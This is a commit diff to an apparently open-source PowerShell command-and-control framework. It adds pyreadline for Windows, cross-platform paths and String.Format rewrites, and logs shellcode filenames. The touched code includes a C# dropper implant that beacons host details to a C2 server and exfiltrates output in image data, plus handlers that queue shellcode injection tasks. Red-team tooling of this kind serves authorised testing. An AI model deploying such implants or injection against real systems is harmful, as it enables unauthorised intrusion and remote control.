Use pyreadline for Windows compatibility and when injecting shellcode log filename

Config.py

@@ -1,4 +1,5 @@
 #!/usr/bin/env python
+import os
 from UrlConfig import UrlConfig
 
 HOST_NAME = '0.0.0.0'
@@ -56,12 +57,12 @@ ServerHeader = "Apache"
 Insecure = "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}"
 
 # DO NOT CHANGE #
-FilesDirectory = "%sFiles/" % POSHDIR
-PayloadsDirectory = "%spayloads/" % ROOTDIR
-ModulesDirectory = "%sModules/" % POSHDIR
-DownloadsDirectory = "%sdownloads/" % ROOTDIR
-ReportsDirectory = "%sreports/" % ROOTDIR
-Database = "%s/PowershellC2.SQLite" % ROOTDIR
+FilesDirectory = "%sFiles%s" % (POSHDIR, os.sep)
+PayloadsDirectory = "%spayloads%s" % (ROOTDIR, os.sep)
+ModulesDirectory = "%sModules%s" % (POSHDIR, os.sep)
+DownloadsDirectory = "%sdownloads%s" % (ROOTDIR, os.sep)
+ReportsDirectory = "%sreports%s" % (ROOTDIR, os.sep)
+Database = "%s%sPowershellC2.SQLite" % (ROOTDIR, os.sep)
   
 # DO NOT CHANGE #
 # These rules aren't needed as you'll find them auto-generated within the project folder now.

Core.py

@@ -1,9 +1,9 @@
 #!/usr/bin/python
 
-import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob
+import zlib, argparse, os, re, datetime, time, base64, string, random, codecs, glob, readline, pyreadline.rlmain
 from Config import HTTPResponses, POSHDIR, PayloadsDirectory
 from Utils import randomuri 
-from TabComplete import readline, tabCompleter
+from TabComplete import tabCompleter
 from Help import COMMANDS
 
 def default_response():

Files/dropper.cs

@@ -77,7 +77,7 @@ public class Program
 		x.Headers.Add("Referrer", "#REPLACEREFERER#");
 
 		if (null != cookie)
-			x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
+			x.Headers.Add(System.Net.HttpRequestHeader.Cookie, String.Format("SessionID={0}", cookie));
 
 		return x;
 	}
@@ -188,7 +188,7 @@ public class Program
 			var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
 			int pid = Process.GetCurrentProcess().Id;
 			Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
-			var o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
+			var o = String.Format("{0};{1};{2};{3};{4};#REPLACEBASEURL#", dn, u, cn, arch, pid);
 			String key = "#REPLACEKEY#", baseURL = "#REPLACEBASEURL#", s = "#REPLACESTARTURL#";
 
 			var primer = GetWebRequest(Encryption(key, o)).DownloadString(s);
@@ -331,7 +331,7 @@ public class Program
 		internal static String GenerateUrl()
 		{
 			string URL = _stringnewURLS[_rnd.Next(_stringnewURLS.Count)];
-			return $"{_baseUrl}/{URL}{Guid.NewGuid()}/?{_randomURI}";
+			return String.Format("{0}/{1}{2}/?{3}", _baseUrl, URL, Guid.NewGuid(), _randomURI);
 		}
 	}
 	
@@ -502,7 +502,7 @@ public class Program
 								beacontime = Parse_Beacon_Time(mch.Groups["t"].Value, mch.Groups["u"].Value);
 							}
 							else
-								output.AppendLine($@"[X] Invalid time ""{c}""");
+								output.AppendLine(String.Format(@"[X] Invalid time ""{0}""", c));
 						}
 	
 						output.AppendLine(strOutput.ToString());
@@ -519,7 +519,7 @@ public class Program
 			catch (Exception e)
 			{
 				var task = Encryption(Key, "Error");
-				var eroutput = Encryption(Key, $"Error: {output.ToString()} {e}", true);
+				var eroutput = Encryption(Key, String.Format("Error: {0} {1}", output.ToString(), e), true);
 				var outputBytes = System.Convert.FromBase64String(eroutput);
 				var sendBytes = ImgGen.GetImgData(outputBytes);
 				GetWebRequest(task).UploadData(UrlGen.GenerateUrl(), sendBytes);

ImplantHandler.py

@@ -1,6 +1,6 @@
 #!/usr/bin/python
  
-import sys, re, os, readline, time, subprocess, traceback, signal, argparse
+import sys, re, os, time, subprocess, traceback, signal, argparse, readline, pyreadline.rlmain
 from sqlite3 import Error
 from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
 from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails

PSHandler.py

@@ -1,4 +1,4 @@
-import base64, re, traceback, os, sys
+import base64, re, traceback, os, sys, readline, pyreadline.rlmain
 from Alias import ps_alias
 from Colours import Colours
 from Utils import randomuri, validate_sleep_time
@@ -10,7 +10,7 @@ from Core import readfile_with_completion, filecomplete
 from Opsec import ps_opsec
 from Payloads import Payloads
 from Utils import argp, load_file, gen_key
-from TabComplete import readline, tabCompleter
+from TabComplete import tabCompleter
 
 def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
     try:
@@ -406,7 +406,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
         shellcodefile = load_file(path)
         if shellcodefile != None:
           arch = "64"
-          new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
+          new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
           new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)
       except Exception as e:
         print ("Error loading file: %s" % e)
@@ -471,13 +471,16 @@ def migrate(randomuri, user, params=""):
     arch = "86"
 
   if implant_comms == "Normal":
-    shellcodefile = load_file("%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
+    path = "%spayloads/Posh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
+    shellcodefile = load_file(path)
   elif implant_comms == "Daisy":
     daisyname = raw_input("Name required: ")
-    shellcodefile = load_file("%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch))
+    path = "%spayloads/%sPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,daisyname,arch)
+    shellcodefile = load_file(path)
   elif implant_comms == "Proxy":
-    shellcodefile = load_file("%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch))
+    path = "%spayloads/ProxyPosh_v4_x%s_Shellcode.bin" % (ROOTDIR,arch)
+    shellcodefile = load_file(path)
 
   check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
-  new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), user, randomuri)
+  new_task("$Shellcode%s=\"%s\" #%s" % (arch,base64.b64encode(shellcodefile), os.path.basename(path)), user, randomuri)
   new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), user, randomuri)

Payloads.py

@@ -190,7 +190,8 @@ class Payloads(object):
     output_file.write(cs9)
     output_file.close()
     if os.name == 'nt':
-        compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe %s%sdropper.cs -o %s%sdropper_cs.exe" % (self.BaseDirectory, name, self.BaseDirectory, name)
+        compile = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:library -out:%s%sdropper_cs.dll %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
+        compileexe =  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe -target:exe -out:%s%sdropper_cs.exe %s%sdropper.cs " % (self.BaseDirectory, name, self.BaseDirectory, name)
     else:
         compile = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.dll -target:library -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)
         compileexe = "mono-csc %s%sdropper.cs -out:%s%sdropper_cs.exe -target:exe -warn:2" % (self.BaseDirectory,name,self.BaseDirectory,name)

SharpHandler.py

@@ -75,7 +75,7 @@ def handle_sharp_command(command, user, randomuri, startup):
         try:
           shellcodefile = load_file(path)
           if shellcodefile != None:
-            new_task("run-exe Core.Program Core Inject-Shellcode %s%s" % (base64.b64encode(shellcodefile),params), user, randomuri)
+            new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri)
         except Exception as e:
           print ("Error loading file: %s" % e)
 

TabComplete.py

@@ -1,6 +1,6 @@
 #!/usr/bin/python
 
-import os, sys, readline, glob
+import os, sys, readline, pyreadline.rlmain, glob
 
 class tabCompleter(object):
   """ 

Tasks.py

@@ -19,12 +19,9 @@ def newTask(path):
           user_command = command
           hostinfo = DB.get_hostinfo(RandomURI)
           now = datetime.datetime.now()
-          if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode64")) :
-           user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
-          elif (command.lower().startswith("run-exe core.program core inject-shellcode")) :
-           user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
-          elif (command.lower().startswith("$shellcode86")) or (command.lower().startswith("$shellcode86")) :
-           user_command = command[0:150]+"......TRUNCATED......"+command[-80:]
+          if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")) :
+           user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
+           command = command[:command.index("#")]
           elif (command.lower().startswith('upload-file')):
             filepath = command.replace('upload-file', '')
             if ";" in filepath:

changelog.txt

@@ -14,6 +14,8 @@ Add a configurable jitter to all implants
 Update the notifications config if it is changed in the Config.py
 Add NotificationsProjectName in Config.py which is displayed in notifications message
 Add fpc script which searches the Posh DB for a particular command
+Use pyreadline for Windows compatibility
+Modify InjectShellcode logged command to remove base64 encoded shellcode and instead just log loaded filename
 
 4.8 (13/02/19)
 ==============

requirements.txt

@@ -2,3 +2,4 @@ pyopenssl
 pandas
 pyttsx3
 pycrypto
+pyreadline